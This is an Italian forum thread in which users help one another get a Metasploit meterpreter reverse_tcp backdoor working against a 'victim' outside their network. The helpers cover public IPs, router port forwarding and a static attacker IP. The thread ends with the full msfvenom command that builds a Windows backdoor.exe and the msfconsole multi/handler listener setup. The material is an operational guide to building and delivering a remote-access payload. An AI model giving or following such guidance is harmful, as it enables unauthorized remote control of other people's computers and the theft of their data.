Domanda Risolto Malware Backdoor msfconsole

Stato
Discussione chiusa ad ulteriori risposte.

ChryITA

Utente Bronze
17 Aprile 2021
97
29
5
47
ciao, quando creo la backdoor con msfconsole (meterpreter_reverse_tcp) quando la invio e la vittima la scarica, non si apre nessuna sessione. Se invece lo invio nel mio windows si apre la sessione. Come risolvo? grazie
 
prima di tutto la vittima si trova dentro o fuori dalla tua rete
se la vittima è collegata alla tua rete metti l IP locale
se invece la vittima non è collegata alla tua rete
devi scrivere nell msfvenom il tuo IP pubblico e una porta forwordata




comunque spiegati meglio
 
  • Mi piace
Reazioni: inforge-user001
Ciao, ho testato mandando la backdoor ad un mio amico, io mettevo l'ip del computer per fare localhost da ifconfig. Cosa intendi per porta forwardata? Io mettevo sempre la 443, grazie
 
Ultima modifica:
Ciao non devi usare l IP locale in questo caso ma quello pubblico per vedere il tuo IP pubblico ci sono vari siti ora ti mando un link
ecco una volta visto lo copi e lo incolli nel msfvenom al LHOST=(tuo IP pubblico)
pero per far che la tua backdoor comunichi con te devi aprire una porta in WAN
ci sono vari tutorial online ora ti mando un link
https://www.aranzulla.it/come-aprire-le-porte-del-router-31808.html
questo è di aranzulla te lo spiega su diversi router quindi dovresti riuscire ad aprire una porta ora aprine una che vuoi tu pero ti consiglio porte alte una volta che hai aperto la porta la scrivi su LPORT=(porta che hai forwardato) fai compilare la backdoor ed è pronta




qua lo spiega bene meglio di come lo ho spiegato io di sicuro



ovviamente se il target che attacchi non è un telefono ed è per esempio un windows cambi payload
 
Ultima modifica:
Grazie mille, dopo testo e ti faccio sapere!
Messaggio unito automaticamente:

ciao, ho provato a fare tutto ma niente, non si apre nessuna sessione
 
allora se hai fatto tutto correttamente e non si apre nessuna sessione
potrebbe essere che sei sotto NAT mi scrivi il tuo gestore internet
 
ho 3 residenze, una tim, vodafone e tiscal
Messaggio unito automaticamente:

Cattura.png
 
Ultima modifica:
allora in host LAN metti l indirizzo IP del tuo pc, pero ti conviene mettere un indirizzo IP locale statico al tuo pc senno il router ti assegnerà un indirizzo IP locale diverso ogni volta quindi sarebbe un macello
quindi prima di tutto assegna un indirizzo IP locale statico al tuo pc
dopo inserisci questo IP in host LAN
(indirizzo IP host WAN)

allora ho fatto delle ricerche su (indirizzo IP host wan ) sul forum di tim e dicono di mettere

192.168.1.1 -- 192.168.1.1

non so se sia corretto però

cioè
(gateway) -- (gateway)
 
Nel caso se volessi potresti venire su discord ad aiutarmi se ti va
Cattura.png
re direttamente su discord ad aiutarmi se ti va
 
Ultima modifica:
proviamo un ultima volta senno domani vengo su discord
 
se non va questo prova a mettere

0.0.0.0 -- 0.0.0.0
questo dovrebbe essere il modo giusto


senno domani vediamo su discord
 
no, non ha funzionato. Apro il .exe ma la sessione non si apre
Messaggio unito automaticamente:

su host lan devo mettere l'ip del computer? (facendo ipconfig da cmd di windows)
 
Ultima modifica:
in che senso
Messaggio unito automaticamente:

ti mando uno screen, te lo posso mandare in privato da qualche parte?
Messaggio unito automaticamente:

backdoorexe.png
 
Ultima modifica:
allora la backdoor e stata scritta correttamente ma tu su host lan non devi mettere l IP di windows ma di kali
Ciao innanzitutto ti ringrazio per la tua disponibilità e gentilezza, Sono l’amico di chry con cui stiamo testando queste backdoor ho seguito tutti i passaggi elencati,su host lan quando metto ip di Linux mi da errore
Messaggio unito automaticamente:

Se vuoi ti elenco tutti i passaggi che faccio a partire dal port forwarding a msfvenom a msfconsole
 
allora stiamo facendo troppa confusione quindi seguite questi passaggi

1)impostate un IP locale statico al pc ATTACCANTE
perchè senno ogni volta il router vi cambia l IP e le regole del port forwarding non funzionano

2)dopo configurate il port forwording
per configurare il port forwarwarding ho fatto delle ricerche

allora in indirizzo IP host wan dovete mettere 0.0.0.0 -- 0.0.0.0
dopo in host lan mettete l IP locale statico dell ATTACCANTE che avete impostato prima
e dopo mettete le porte che volete

3)fatemi vedere i comandi usati per generare la backdoor e per impostare il listener in msfconsole
 
allora stiamo facendo troppa confusione quindi seguite questi passaggi

1)impostate un IP locale statico al pc ATTACCANTE
perchè senno ogni volta il router vi cambia l IP e le regole del port forwarding non funzionano

2)dopo configurate il port forwording
per configurare il port forwarwarding ho fatto delle ricerche

allora in indirizzo IP host wan dovete mettere 0.0.0.0 -- 0.0.0.0
dopo in host lan mettete l IP locale statico dell ATTACCANTE che avete impostato prima
e dopo mettete le porte che volete

3)fatemi vedere i comandi usati per generare la backdoor e per impostare il listener in msfconsole
ok grazie, una cosa. Per vodafone non riesco proprio a capire come si setti il port forwarding,
 
ti avevo mandato questo articolo di aranzulla qua parla anche di vodafone

 
Ultima modifica:
allora stiamo facendo troppa confusione quindi seguite questi passaggi

1)impostate un IP locale statico al pc ATTACCANTE
perchè senno ogni volta il router vi cambia l IP e le regole del port forwarding non funzionano

2)dopo configurate il port forwording
per configurare il port forwarwarding ho fatto delle ricerche

allora in indirizzo IP host wan dovete mettere 0.0.0.0 -- 0.0.0.0
dopo in host lan mettete l IP locale statico dell ATTACCANTE che avete impostato prima
e dopo mettete le porte che volete

3)fatemi vedere i comandi usati per generare la backdoor e per impostare il listener in msfconsole
Allora dimmi se ho sbagliato qualcosa nel settare l'ip statico sulla macchina attacante cioè linux. Ho eseguito i seguenti comandi:

sudo ifconfig [nome_interfaccia] [indirzzo_IP] netmask 255.255.255.0

/etc/init.d/networking restart

Per quanto riguarda msfvenom il Payload lo creo con il seguente comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP PUBBLICO] LPORT=[LA PORTA CHE HO FORWARDATO] -f exe -o backdoor.exe

Per metasploit invece apro msfconsole e digito:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST [IP MACCHINA ATTACANTE]
set LPORT [PORTA FORWARDATA]
exploit

[*] Started reverse TCP handler on[IP]/[PORTA]

ma nulla quando apre il .exe non si apre nessuna sessione.
 
Stato
Discussione chiusa ad ulteriori risposte.